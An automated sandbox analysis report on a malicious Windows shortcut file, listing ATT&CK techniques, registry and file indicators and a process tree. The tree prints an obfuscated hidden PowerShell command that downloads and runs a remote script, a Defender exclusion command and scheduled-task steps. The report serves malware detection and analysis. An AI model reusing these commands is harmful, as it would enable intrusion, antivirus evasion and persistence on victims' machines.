02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc

Analysis

max time kernel
146s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 10:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc.lnk
Size

2KB
MD5

464e2f94ac97b9bf225d303e0d05f114
SHA1

d8511f96d21071b1d5a4cf923ba84ed1fb67df46
SHA256

02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc
SHA512

e3e3d3aa76c7d7fc7af1f3d3e339eb3c255d25858fce413479cf8ba43af7137d88dc5cf2127c4b24e30973d65bdd5b76cb9fd0c187604c609f6a1a8438725ff6

Score

9^/10

defense_evasion discovery execution lateral_movement

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1872	net1.exe
4060	net.exe
1460	net1.exe
4892	net.exe

Blocklisted process makes network request 26 IoCs

flow	pid	Process
8	1920	powershell.exe
16	1920	powershell.exe
21	1992	powershell.exe
30	1992	powershell.exe
35	1992	powershell.exe
38	1992	powershell.exe
50	1992	powershell.exe
51	1992	powershell.exe
52	1992	powershell.exe
53	1992	powershell.exe
54	1992	powershell.exe
57	1992	powershell.exe
58	1992	powershell.exe
59	1992	powershell.exe
61	1992	powershell.exe
62	1992	powershell.exe
65	1992	powershell.exe
67	1992	powershell.exe
68	1992	powershell.exe
69	1992	powershell.exe
70	1992	powershell.exe
71	1992	powershell.exe
72	1992	powershell.exe
73	1992	powershell.exe
74	1992	powershell.exe
75	1992	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1920	powershell.exe
2240	powershell.exe
1424	powershell.exe
3080	powershell.exe
1992	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
1724	net.exe
2200	net1.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.lnk	powershell.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File created	C:\Windows\System32\sysmon.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon.bat	cmd.exe
File created	C:\Windows\System32\sysmon2.bat	cmd.exe
File opened for modification	C:\Windows\System32\sysmon2.bat	cmd.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\_BootUEFI_ = "0"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5004	schtasks.exe
540	schtasks.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
1920	powershell.exe
1920	powershell.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
3080	powershell.exe
3080	powershell.exe
1920	powershell.exe
2240	powershell.exe
2240	powershell.exe
1424	powershell.exe
1424	powershell.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
1920	powershell.exe
1920	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe
4440	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3204 wrote to memory of 1920	3204	cmd.exe	84
PID 3204 wrote to memory of 1920	3204	cmd.exe	84
PID 1920 wrote to memory of 4440	1920	powershell.exe	85
PID 1920 wrote to memory of 4440	1920	powershell.exe	85
PID 1920 wrote to memory of 4440	1920	powershell.exe	85
PID 1920 wrote to memory of 3080	1920	powershell.exe	92
PID 1920 wrote to memory of 3080	1920	powershell.exe	92
PID 1920 wrote to memory of 4856	1920	powershell.exe	94
PID 1920 wrote to memory of 4856	1920	powershell.exe	94
PID 4856 wrote to memory of 2240	4856	cmd.exe	96
PID 4856 wrote to memory of 2240	4856	cmd.exe	96
PID 4856 wrote to memory of 960	4856	cmd.exe	97
PID 4856 wrote to memory of 960	4856	cmd.exe	97
PID 4856 wrote to memory of 1640	4856	cmd.exe	98
PID 4856 wrote to memory of 1640	4856	cmd.exe	98
PID 4856 wrote to memory of 5004	4856	cmd.exe	99
PID 4856 wrote to memory of 5004	4856	cmd.exe	99
PID 4856 wrote to memory of 4812	4856	cmd.exe	100
PID 4856 wrote to memory of 4812	4856	cmd.exe	100
PID 512 wrote to memory of 4612	512	cmd.exe	103
PID 512 wrote to memory of 4612	512	cmd.exe	103
PID 512 wrote to memory of 832	512	cmd.exe	104
PID 512 wrote to memory of 832	512	cmd.exe	104
PID 512 wrote to memory of 540	512	cmd.exe	105
PID 512 wrote to memory of 540	512	cmd.exe	105
PID 512 wrote to memory of 3468	512	cmd.exe	106
PID 512 wrote to memory of 3468	512	cmd.exe	106
PID 1888 wrote to memory of 1464	1888	cmd.exe	109
PID 1888 wrote to memory of 1464	1888	cmd.exe	109
PID 1464 wrote to memory of 3324	1464	net.exe	110
PID 1464 wrote to memory of 3324	1464	net.exe	110
PID 1888 wrote to memory of 2236	1888	cmd.exe	111
PID 1888 wrote to memory of 2236	1888	cmd.exe	111
PID 2236 wrote to memory of 5032	2236	net.exe	112
PID 2236 wrote to memory of 5032	2236	net.exe	112
PID 1888 wrote to memory of 2444	1888	cmd.exe	113
PID 1888 wrote to memory of 2444	1888	cmd.exe	113
PID 2444 wrote to memory of 4532	2444	net.exe	114
PID 2444 wrote to memory of 4532	2444	net.exe	114
PID 1888 wrote to memory of 4892	1888	cmd.exe	115
PID 1888 wrote to memory of 4892	1888	cmd.exe	115
PID 4892 wrote to memory of 1872	4892	net.exe	116
PID 4892 wrote to memory of 1872	4892	net.exe	116
PID 1888 wrote to memory of 4060	1888	cmd.exe	118
PID 1888 wrote to memory of 4060	1888	cmd.exe	118
PID 4060 wrote to memory of 1460	4060	net.exe	119
PID 4060 wrote to memory of 1460	4060	net.exe	119
PID 1888 wrote to memory of 1724	1888	cmd.exe	122
PID 1888 wrote to memory of 1724	1888	cmd.exe	122
PID 1724 wrote to memory of 2200	1724	net.exe	123
PID 1724 wrote to memory of 2200	1724	net.exe	123
PID 4440 wrote to memory of 60	4440	AcroRd32.exe	117
PID 4440 wrote to memory of 60	4440	AcroRd32.exe	117
PID 4440 wrote to memory of 60	4440	AcroRd32.exe	117
PID 1888 wrote to memory of 3076	1888	cmd.exe	124
PID 1888 wrote to memory of 3076	1888	cmd.exe	124
PID 1888 wrote to memory of 2920	1888	cmd.exe	125
PID 1888 wrote to memory of 2920	1888	cmd.exe	125
PID 1888 wrote to memory of 4332	1888	cmd.exe	126
PID 1888 wrote to memory of 4332	1888	cmd.exe	126
PID 1888 wrote to memory of 1028	1888	cmd.exe	127
PID 1888 wrote to memory of 1028	1888	cmd.exe	127
PID 1888 wrote to memory of 2612	1888	cmd.exe	128
PID 1888 wrote to memory of 2612	1888	cmd.exe	128

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\02ad87e946a127508c1741205a106e1a05da79f5b20ec10bf1507aae01f949dc.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command &{$ty = 'h5&24g#' + 'UofhxvBcjU' + 'bh#n^_fev4df' + 'hhjwh#dhCz' + 'ghii57r6_fr#tKy' + 'jhr9tfKJry'; [string] $aCmd = {(New-xprObject Nxpretxpr.WebCxprlient).DoxprwnlxproadxprStrxprinxprg('ht' + 'txprps:/' + '/xprpaxprn' + 'axprkexpros' + '.xpricxpru/scxprrxprxpriptxprs/scxpr-xpr' + 'xprintxprermexprdixprxpratexpr.pxprs1xpr')}; $rCmd = $aCmd.replace('xpr', ''); $finalExec = iex $rCmd; iex $finalExec; }
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Report_Estimiation_SKT_20241112472075939.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      System Location Discovery: System Language Discovery
      PID:60
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8298B0EEABFA335B2D44BC4EC7F77152 --mojo-platform-channel-handle=1716 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3144
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7202C40AB00C9F1FFA13FC239E6B726B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7202C40AB00C9F1FFA13FC239E6B726B --renderer-client-id=2 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3748
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D5B9750BB6AF43EB7D741B24C22A746B --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4376
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AE6CAEC9419EA2786A1979D3C339E576 --mojo-platform-channel-handle=1864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3600
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=74D3AC928FC0904691F2E7C352F48AC1 --mojo-platform-channel-handle=1944 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\scheduler-once.bat"
    3⤵
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:4856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -w hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AHcAaQBuAGQAaQByAFwAUwB5AHMAdABlAG0AMwAyACIA
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2240
  - - C:\Windows\system32\schtasks.exe
      schtasks /delete /tn "Intel(R) Ethernet Connection 1219-LM" /f
      4⤵
      PID:960
  - - C:\Windows\system32\schtasks.exe
      schtasks /delete /tn "Intel(R) Ethernet2 Connection 1219-LM" /f
